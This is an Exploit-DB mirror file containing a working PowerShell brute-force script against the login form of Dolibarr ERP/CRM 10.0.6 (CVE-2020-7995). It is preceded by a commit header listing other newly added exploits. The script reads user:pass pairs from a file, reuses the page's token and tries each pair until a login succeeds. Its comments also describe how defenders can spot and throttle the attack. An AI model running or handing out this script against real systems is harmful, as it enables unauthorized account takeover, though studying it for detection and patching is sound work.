exploit-db-mirror/exploits/php/webapps/50140.ps1
Offensive Security c385c8068c DB: 2021-07-20
6 changes to exploits/shellcodes

WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)
Dolibarr ERP/CRM 10.0.6 - Login Brute Force
PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection

Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
2021-07-20 05:01:52 +00:00



# Exploit Title: Dolibarr ERP/CRM 10.0.6 - Login Brute Force
# Date:2020-01-18
# Exploit Author: Creamy Chicken Soup
# Vendor Homepage: https://www.dolibarr.org
# Software Link: https://sourceforge.net/projects/dolibarr/
# Version: 10.0.6
# Tested on: Windows 10 - 64bit
# CVE: CVE-2020-7995
# brute: submit one username/password pair to the login form served at $url.
# Parameters:
#   $url      - address of the login page; it is fetched once and then posted to.
#   $username - login name placed in the "username" form field.
#   $passwd   - password placed in the "password" form field.
# Returns $true when the form Id(s) in the POST response do not compare equal
# to "login" (the login form was apparently not served again). In every other
# case, including a request that throws, nothing is returned.
# Defender's view: each call issues one GET followed by one POST to the same
# URL, so a run appears in web access logs as repeated GET/POST pairs from a
# single client. The file header attributes this to CVE-2020-7995, the missing
# limit on failed authentication attempts in Dolibarr 10.0.6; throttling or
# locking out repeated failed logins on the server is the control that stops it.
function brute($url,$username,$passwd){
try{
# Fetch the login page first so the form's hidden fields can be read.
$WebResponse = Invoke-WebRequest $url
$a=$WebResponse.Forms.fields
# Reuse the page's own "token" and "loginfunction" values next to the credentials under test.
$fields=@{"token"=$a.token ;"loginfunction"=$a.loginfunction;"username"=$username;"password"=$passwd}
$WebResponse1 = Invoke-WebRequest -Uri $url -Method Post -Body $fields
# Success is inferred only from the absence of the "login" form Id in the reply.
if($WebResponse1.Forms.Id -ne "login"){
Write-Host "username password is match"
Write-Warning "user: $username ,passwoed: $passwd"
return $true
}
}catch{
# Any exception (network error, missing form fields, ...) is reduced to this one warning.
Write-Warning "Something Wrong!"
}
}
# fileinput: read credential pairs from a text file and try each one against $url.
# Parameters:
#   $filepath - path of a text file holding one "user:pass" pair per line.
#   $url      - login page address handed unchanged to brute.
# Returns nothing; progress is written to the host, and the loop ends at the
# first pair for which brute returns $true.
# Defender's view: the pairs are tried one after another with no pause between
# them in this loop, so the request rate is bounded only by how fast the server
# answers. A server-side limit on failed logins per account or per source
# address is what interrupts it.
function fileinput($filepath,$url){
try{
Write-Host "Target: $url"
$fp=Get-Content -Path $filepath
foreach($line in $fp){
# Only the first two ':'-separated pieces are used; anything after a second ':' is ignored.
$s=$line -split ':'
$username=$s[0]
$passwd=$s[1]
Write-Host "[+] Check $username : $passwd"
$bf=brute $url $username $passwd
# brute returns $true only on an apparent login; stop at the first one.
if($bf -eq $True){
break
}
}
}catch{
# Reached when an exception propagates out of the block above, e.g. the file cannot be read.
Write-Warning "File is error"
}
}
# Script entry point: print the banner and the advisory details, prompt for the
# login URL and the credential file, then hand both to fileinput.
# The banner text is a literal here-string (@' ... '@), so nothing inside it is expanded.
$textart=@'
____ ____ _____ ____ _ ___ _ ____ _ _ ____ _ __ _____ _ ____ ____ _ ____
/ _\/ __\/ __// _ \/ \__/|\ \/// _\/ \ /|/ \/ _\/ |/ // __// \ /|/ ___\/ _ \/ \ /\/ __\
| / | \/|| \ | / \|| |\/|| \ / | / | |_||| || / | / | \ | |\ ||| \| / \|| | ||| \/|
| \__| /| /_ | |-||| | || / / | \__| | ||| || \_ | \ | /_ | | \||\___ || \_/|| \_/|| __/
\____/\_/\_\\____\\_/ \|\_/ \|/_/ \____/\_/ \|\_/\____/\_|\_\\____\\_/ \|\____/\____/\____/\_/
'@
Write-Host $textart
# Advisory summary shown to the operator; the "Vulnerable Page" line names the
# Dolibarr login page (htdocs/index.php?mainmenu=home), which is the endpoint to
# watch for bursts of failed logins.
Write-Host @'
Exploit Title: DOLIBARR ERP/CRM - Brute Force Vulnerability
Date: 2020-01-18
Exploit Author: CreamyChickenSoup
Vendor Homepage: https://www.dolibarr.org
Version: 10.0.6
CVE: CVE-2020-7995
Vulnerable Page : http://localhost/htdocs/index.php?mainmenu=home
Twitter: @creamychickens1
cve submited:Tufan Gungor
'@
# Both values are read interactively and passed on without validation.
$url=Read-Host "Enter Url:"
$filepath=Read-Host "Enter FilePAth: (File content like : user:pass)"
fileinput $filepath $url